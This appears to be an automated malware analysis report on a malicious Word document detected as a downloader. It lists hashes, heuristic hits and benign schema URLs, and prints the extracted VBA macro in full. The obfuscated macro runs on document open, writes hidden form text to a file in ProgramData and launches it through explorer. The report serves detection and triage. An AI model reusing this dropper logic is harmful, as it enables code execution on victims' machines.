Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 17c009d0cbfcf3bd…

MALICIOUS

Office (OOXML)

79.2 KB Created: 2021-02-25 07:18:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-03-01
MD5: 339834416d9605c88b39c99d5a8eb3f2 SHA-1: 0e6bf062194065ac1100b14e6cbfb673939eade4 SHA-256: 17c009d0cbfcf3bd83ed06a3ba7edd019d71226cbd44f07e058afe851a225ff7
192 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Interaction.Shell aHDWrx(aFAtzm) & " " & aHX3xw
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set aSNVYX = CreateObject("Scripting.FileSystemObject")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4390 bytes
SHA-256: e21e549687f8d23fc37029807c147f76424223b36e4d68557aa8e894014b146b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iform"
Attribute VB_Base = "0{7672AD7D-1687-4D5A-8307-B569E7861D19}{BFE90A09-FCC2-44C2-91DE-799856F55802}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "a3dcDL"
Sub AutoOpen()
' Repair complaints ready
' Links freshman ladder patrol budapest
aPR7u
End Sub

Attribute VB_Name = "aqblM"
Function aVFGM()
aVFGM = Array(105, 48, 86, 122, 120, 101, 109, 120, 107, 103, 110, 107, 126, 107, 86, 107, 89, 92, 59, 105, 36, 98, 126, 107)
End Function
Function aFAtzm()
aFAtzm = Array(105, 48, 86, 125, 99, 100, 110, 101, 125, 121, 86, 111, 114, 122, 102, 101, 120, 111, 120)
End Function

Attribute VB_Name = "aMApij"
Sub aSjOb(ak8Dj, aW5Un)
' Norse smear rhinoceros surround tea lathe
' Interdict abler relaxing
Set aSNVYX = CreateObject("Scripting.FileSystemObject")
' Vigilant nitrogen
' Nelly lath palmer indubitable
' Compatible waterproof riband ezra
' Ph
Set a9zpf = aSNVYX.CreateTextFile(ak8Dj)
a9zpf.WriteLine aW5Un
a9zpf.Close
' Straighten louis alibi
' Files
' Designs mysterious carlo
' Zeb thoughts collectables planned
' Cask wan incautious division immigrants neutral sponsorship
' Reveals governance perishable
' Mpeg reaching
' Census review unskilled
' Brick instruments
' Leavings
End Sub
Function av0OD(a9DRHE, ak6Vc)
' Variation blade festivals nowise
' Sallies slack leafy ecological hazy
' Relation feasibility chapman swaziland separates genealogy
If Len(a9DRHE) <> 4 Then av0OD = a9DRHE Xor ak6Vc
End Function
Function aHDWrx(aaK9n7 As Variant)
Dim aIHZL As String
aIHZL = ""
' Dormitory
' Upsetting japanese certificates vom
' Grocery ya operated gregory halo sierra
' Protective pct fleet controversial fame member
' Lint golf communist
' Cinderella show chen
' Scorch lambent imperceptibly toys webshots
' Mow ka complicity
' Checking existent precipitation
' Cached voter attention
' Dragoon burrow entertaining
For apO5ig = 0 To UBound(aaK9n7)
a7KdL = ahatG8(av0OD(aaK9n7(apO5ig), 10))
aIHZL = aIHZL & a7KdL
Next apO5ig
aHDWrx = aIHZL
End Function
Function aPMvL(ahxrls)
alVcW = ""
For a1MV2G = Len(ahxrls) To 1 Step -1
alVcW = alVcW & "" & Mid(ahxrls, a1MV2G, 1)
Next a1MV2G
aPMvL = alVcW
End Function
Function aFmNc()
' Esdras hazards slipshod pill
' Unicorn extraction arrange injury senile
' Organize cant modifies swap stands
' Beverly streams scout hips
aFmNc = aPMvL(iform.txt1.text)
End Function
Function ahatG8(a9DRHE)
' Editorial gateway
' Recession noble nurture observatory healthy wrong batman
' Maldives
If a9DRHE <> 16 Then
ahatG8 = Chr("" & a9DRHE & "")
End If
End Function
Sub aPR7u()
' Goad push gymnastics superficially
' Accountable journeyman bitch boat forgetful produced stag
' Restrict charm uc
' Inferno effort layers interaction fewest
' Entering poet
' Forty-six alloy evacuation insertion prague early baiting
' Lectures
' Be releases
' Emigrant inaccuracy
aW5Un = aFmNc()
' Reasonably scope babylonian honors
' Marred discourteous apartment shame centre
' Amanda partner
' Dietary ezekiel coasting approval
' Sleigh remnants burgher
' Malthus
aHX3xw = aHDWrx(aVFGM)
' Infraction evening magpie
' Solved kodak utrecht licence
' Flashlight oz village inimical rama
' Unattainable canada abbot regulations
Call aSjOb(aHX3xw, aW5Un)
' Shrew ravish someone societies sophist
' Brushing refrigerator hills being
' Transgress feel proffer needle abstemious apply
' Efficacy crime aa highly sundown talisman
Interaction.Shell aHDWrx(aFAtzm) & " " & aHX3xw
' Methodology charger mediocrity ginger gst belated pathology
' Naturals aggression cycles
' Prescription inlaid
' Treble time
' Mh lullaby horny restrict degrade
' Trap grants
' Comedy establishing overnight puzzles belittle
' Stow ampland seth 404
' Lascivious similarly bermuda coherence
' Ht dale
' Kith meteoric nickel scuttle matter-of-fact comeliness anathema
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 31744 bytes
SHA-256: 3e944785c348065bebb8f14633b760bfe2b29f18f329c192226ede5bd1724ebd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.